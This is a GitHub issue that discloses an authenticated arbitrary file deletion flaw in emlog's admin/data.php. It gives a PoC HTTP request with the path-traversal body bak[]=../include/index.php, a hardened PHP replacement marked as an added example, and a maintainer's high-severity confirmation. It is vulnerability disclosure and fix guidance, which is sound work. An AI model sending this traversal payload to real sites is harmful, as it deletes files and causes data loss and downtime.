emlog has any file deletion vulnerability #48

Closed
Rand0mPythoner opened this issue Sep 25, 2019 · 2 comments

@Rand0mPythoner

Rand0mPythoner commented Sep 25, 2019

Vulnerability in admin/data.php, line 139:

if ($action == 'dell_all_bak') {
    if (!isset($_POST['bak'])) {
        emDirect('./data.php?error_a=1');
    } else{
        foreach ($_POST['bak'] as $val) {
            unlink($val);
        }
        emDirect('./data.php?active_del=1');
    }
}

Posting any file path as "bak" will delete it.
Log in to the management background and visit /admin/data.php?action=dell_all_bak
POST bak=anyfile, like ../index.php or something.
PoC:

Host: 127.0.0.1
Content-Length: 28
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/emlog/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597
Connection: close

bak%5B%5D=../include/index.php
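
A hardened form of the deletion loop quoted above, as an added example that is not emlog's code or its actual fix. The function names, the demo directory layout and the rule that backups are `.sql` files kept in one directory are assumptions made for illustration.

```php
<?php
// Added example, not emlog's code. Returns the real path when $name is a
// regular .sql file directly inside $backupDir, otherwise null.
function resolve_backup(string $name, string $backupDir): ?string
{
    $root = realpath($backupDir);
    if ($root === false) {
        return null;
    }
    // Drop any directory part: "../include/index.php" becomes "index.php".
    $base = basename(str_replace('\\', '/', $name));
    if (!preg_match('/\A[A-Za-z0-9_.-]+\.sql\z/', $base)) {
        return null; // assumption: backups are always *.sql
    }
    $path = realpath($root . DIRECTORY_SEPARATOR . $base);
    // realpath() follows symlinks; the target must still sit directly in $root.
    if ($path === false || dirname($path) !== $root || !is_file($path)) {
        return null;
    }
    return $path;
}

// Deletes only validated backups and reports what was refused.
function delete_backups($posted, string $backupDir): array
{
    $result = ['deleted' => [], 'rejected' => []];
    foreach ((array) $posted as $val) {
        $path = is_string($val) ? resolve_backup($val, $backupDir) : null;
        if ($path !== null && unlink($path)) {
            $result['deleted'][] = basename($path);
        } else {
            $result['rejected'][] = $val;
        }
    }
    return $result;
}

// Constructed demo: a throwaway tree standing in for the site root.
$site = sys_get_temp_dir() . '/emlog_demo_' . bin2hex(random_bytes(4));
mkdir("$site/backup", 0700, true);
mkdir("$site/include", 0700, true);
file_put_contents("$site/backup/emlog_20190925.sql", '-- dump');
file_put_contents("$site/include/index.php", '<?php');

$r = delete_backups(['emlog_20190925.sql', '../include/index.php'], "$site/backup");
echo json_encode($r), PHP_EOL;
echo file_exists("$site/include/index.php") ? "index.php kept" : "index.php deleted", PHP_EOL;
```

Logging the `rejected` entries gives a record of requests that tried to reach outside the backup directory.
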
@vibbow
Contributor

vibbow commented Sep 25, 2019

Confirm as vulnerability

Severity Level: High

  • Exploitation could result in elevated privileges.
  • Exploitation could result in a significant data loss or downtime.

@Rand0mPythoner
Author

Confirm as vulnerability

Severity Level: High

  • Exploitation could result in elevated privileges.
  • Exploitation could result in a significant data loss or downtime.

I will find more security vulnerabilities for your CMS.
Your attitude towards problems is very kind.
Have a nice day!

@emlog emlog closed this as completed Jan 10, 2022